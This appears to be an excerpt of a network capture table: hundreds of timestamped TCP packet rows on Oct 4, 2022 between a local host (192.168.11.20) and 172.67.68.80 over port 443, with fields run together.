                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.915479898 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.915487051 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.915499926 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.915673971 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.915682077 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.915787935 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.915923119 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.916060925 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.916069031 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.916204929 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.916212082 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.916224003 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.916331053 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.916383028 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.916384935 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.916390896 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.916562080 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.916563034 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.916672945 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.916681051 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.916805029 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.916862011 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.916980028 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.916994095 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.917131901 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.917208910 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.917232037 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.917239904 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.917349100 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.917447090 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.917474031 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.917488098 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.917546034 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.917553902 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.917649984 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.917757988 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.917805910 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.917813063 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.917937994 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.917942047 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.917948008 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.918133020 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.918159008 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.918303013 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.918392897 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.918404102 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.918488026 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.918509960 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.918728113 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.918751955 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.918972969 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.919012070 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.919025898 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.919147015 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.919228077 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.919234991 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.919403076 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.919416904 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.919416904 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.919425011 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.919526100 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.919532061 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.919673920 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.919775963 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.919776917 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.919785976 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.919884920 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.919893980 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.919926882 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.920002937 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.920010090 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.920110941 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.920120001 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.920124054 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.920278072 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.920281887 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.920289993 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.920363903 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.920474052 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.920516968 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.920607090 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.920615911 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.920661926 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.920676947 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.920814037 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.920823097 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.920859098 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.920867920 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.920871019 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.920994043 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.921001911 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.921046019 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.921155930 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.921164989 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.921232939 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.921241045 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.921334982 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.921340942 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.921474934 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.921483994 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.921539068 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.921545029 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.921772003 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.921785116 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.921792030 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.921794891 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.921799898 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.921911001 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.921978951 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.921992064 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.922136068 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.922151089 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.922235012 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.922241926 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.922343969 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.922424078 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.922431946 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.922511101 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.922523022 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.922530890 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.922720909 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.922837973 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.922844887 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.922955036 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.922961950 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.923080921 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.923151016 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.923157930 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.923233986 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.923280001 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.923306942 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.923424006 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.923430920 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.923489094 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.923512936 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.923626900 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.923635006 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.923641920 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.923794031 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.923806906 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.923846006 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.923851967 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.923943996 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.923952103 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.923971891 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.923979044 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.924123049 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.924159050 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.924165010 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.924304962 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.924313068 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.924439907 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.924446106 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.924566984 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.924690962 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.924791098 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.924798012 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.924877882 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.924885035 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.925004959 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.925106049 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.925113916 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.925159931 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.925160885 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.925286055 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.925292015 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.925328970 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.925409079 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.925546885 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.925554037 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.925726891 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.925785065 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.925792933 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.926042080 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.926063061 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.926156044 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.926223040 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.926239967 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.926248074 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.926491976 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.926548004 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.926597118 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.926603079 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.926690102 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.926812887 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.926840067 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.926908016 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.926914930 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.926986933 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.926991940 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.927083015 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.927203894 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.927221060 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.927227974 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.927320004 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.927439928 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.927486897 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.927494049 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.927589893 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.927597046 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.927609921 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.927697897 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.927769899 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.927776098 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.927910089 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.927917957 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.927993059 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.928036928 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.928042889 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.928190947 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.928265095 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.928271055 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.928363085 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.928378105 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.928553104 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.928589106 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.928597927 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.928731918 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.928740025 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.928822994 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.928841114 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.928848982 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.929025888 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.929033041 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.929085016 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.929107904 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.929300070 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.929308891 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.929409981 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.929416895 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.929594040 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.929594994 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.929615021 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.929696083 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.929744959 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.929871082 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.929884911 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.929893017 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930001974 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930078983 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930128098 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930191040 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930197954 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930269957 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930284023 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930352926 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930360079 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930447102 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930448055 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930460930 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930551052 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930557966 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930613995 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930627108 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930659056 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930767059 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930785894 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930803061 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930815935 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930911064 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930917025 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930985928 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.930999994 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.931061029 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.931149006 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.931163073 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.931169987 CEST44349835172.67.68.80192.168.11.20
